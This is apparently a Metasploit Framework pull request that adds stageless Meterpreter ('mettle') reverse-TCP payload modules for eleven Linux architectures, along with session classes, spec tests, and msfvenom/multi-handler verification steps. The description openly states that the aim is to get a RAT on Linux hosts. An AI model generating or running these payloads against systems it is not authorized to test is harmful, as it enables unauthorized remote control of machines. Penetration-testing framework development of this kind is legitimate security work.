### PR TITLE
Initial stageless mettle payloads

### DIFF
--- a/lib/msf/base/sessions/meterpreter_aarch64_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_aarch64_linux.rb
@@ -1,0 +1,30 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+
+

--- a/lib/msf/base/sessions/meterpreter_armbe_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_armbe_linux.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_armbe_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_ARMBE
+  end
+end
+
+end
+end
+

--- a/lib/msf/base/sessions/meterpreter_mips64_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_mips64_linux.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_mips64_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_MIPS64
+  end
+end
+
+end
+end
+

--- a/lib/msf/base/sessions/meterpreter_ppc64le_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_ppc64le_linux.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_ppc64le_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_PPC64LE
+  end
+end
+
+end
+end
+

--- a/lib/msf/base/sessions/meterpreter_ppc_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_ppc_linux.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_ppc_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_PPC
+  end
+end
+
+end
+end
+

--- a/lib/msf/base/sessions/meterpreter_zarch_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_zarch_linux.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_zarch_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_ZARCH
+  end
+end
+
+end
+end
+

--- a/modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_linux'
+
+module MetasploitModule
+
+  CachedSize = 292344
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_armbe_linux'
+
+module MetasploitModule
+
+  CachedSize = 285000
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_ARMBE,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_armbe_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_armle_linux'
+
+module MetasploitModule
+
+  CachedSize = 284152
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_ARMLE,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_armle_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mips64_linux'
+
+module MetasploitModule
+
+  CachedSize = 504960
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_MIPS64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_mips64_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mipsbe_linux'
+
+module MetasploitModule
+
+  CachedSize = 484668
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_MIPSBE,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_mipsbe_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mipsle_linux'
+
+module MetasploitModule
+
+  CachedSize = 484732
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_MIPSLE,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_mipsle_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppc_linux'
+
+module MetasploitModule
+
+  CachedSize = 329724
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_PPC,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_ppc_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppc64le_linux'
+
+module MetasploitModule
+
+  CachedSize = 396160
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_PPC64LE,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_ppc64le_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_mettle_linux'
+
+module MetasploitModule
+
+  CachedSize = 289824
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_X64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_x64_Mettle_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x86_mettle_linux'
+
+module MetasploitModule
+
+  CachedSize = 292828
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_X86,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_x86_Mettle_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_zarch_linux'
+
+module MetasploitModule
+
+  CachedSize = 367864
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Run the mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_ZARCH,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_zarch_Linux
+      )
+    )
+  end
+
+  def generate
+    MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config).to_binary :exec
+  end
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4258,6 +4258,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/aarch64/mettle_reverse_tcp'
   end
 
+  context 'linux/armbe/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/armbe/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/armbe/mettle_reverse_tcp'
+  end
+
   context 'linux/armle/mettle/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4394,6 +4394,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/x64/mettle/reverse_tcp'
   end
 
+  context 'linux/x64/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/x64/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x64/mettle_reverse_tcp'
+  end
+
   context 'linux/x86/mettle/bind_ipv6_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4342,6 +4342,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/mipsle/mettle/reverse_tcp'
   end
 
+  context 'linux/mipsle/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/mipsle/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/mipsle/mettle_reverse_tcp'
+  end
+
   context 'linux/x64/mettle/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4321,6 +4321,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/mipsbe/mettle/reverse_tcp'
   end
 
+  context 'linux/mipsbe/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/mipsbe/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/mipsbe/mettle_reverse_tcp'
+  end
+
   context 'linux/mipsle/mettle/reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4300,6 +4300,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/armle/mettle_reverse_tcp'
   end
 
+  context 'linux/mips64/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/mips64/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/mips64/mettle_reverse_tcp'
+  end
+
   context 'linux/mipsbe/mettle/reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4290,6 +4290,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/armle/mettle/reverse_tcp'
   end
 
+  context 'linux/armle/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/armle/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/armle/mettle_reverse_tcp'
+  end
+
   context 'linux/mipsbe/mettle/reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4524,4 +4524,14 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/x86/mettle_reverse_tcp'
   end
 
+  context 'linux/zarch/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/zarch/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/zarch/mettle_reverse_tcp'
+  end
+
 end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4513,4 +4513,15 @@ RSpec.describe 'modules/payloads', :content do
                           modules_pathname: modules_pathname,
                           reference_name: 'linux/x86/mettle/reverse_tcp_uuid'
   end
+
+  context 'linux/x86/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/x86/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x86/mettle_reverse_tcp'
+  end
+
 end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4352,6 +4352,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/mipsle/mettle_reverse_tcp'
   end
 
+  context 'linux/ppc/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/ppc/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/ppc/mettle_reverse_tcp'
+  end
+
   context 'linux/x64/mettle/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4362,6 +4362,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/ppc/mettle_reverse_tcp'
   end
 
+  context 'linux/ppc64le/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/ppc64le/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/ppc64le/mettle_reverse_tcp'
+  end
+
   context 'linux/x64/mettle/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4248,6 +4248,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'windows/meterpreter/reverse_winhttps'
   end
 
+  context 'linux/aarch64/mettle_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/linux/aarch64/mettle_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/aarch64/mettle_reverse_tcp'
+  end
+
   context 'linux/armle/mettle/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This adds stageless payloads for 11 Linux architectures. The goal is to be able to drop a file on most any Linux install with kernel version 2.6.17 or higher and get a RAT. Unlike other stageless meterpreters (and injected mettle), these are normal executables, requiring no special permissions or wrx pages to run (see the [mettle](https://github.com/rapid7/mettle) repo for more info and to track development progress).

Verification
=========

- [x] Generate each payload with `msfvenom`
- [x] In `msfconsole`:
- [x] `use exploit/multi/handler`
- [x] `set payload linux/ARCH/mettle_reverse_tcp`
- [x] `set LHOST <IP>`
- [x] Verify that the generated payload runs (qemu is fine), connects to the handler, and opens a session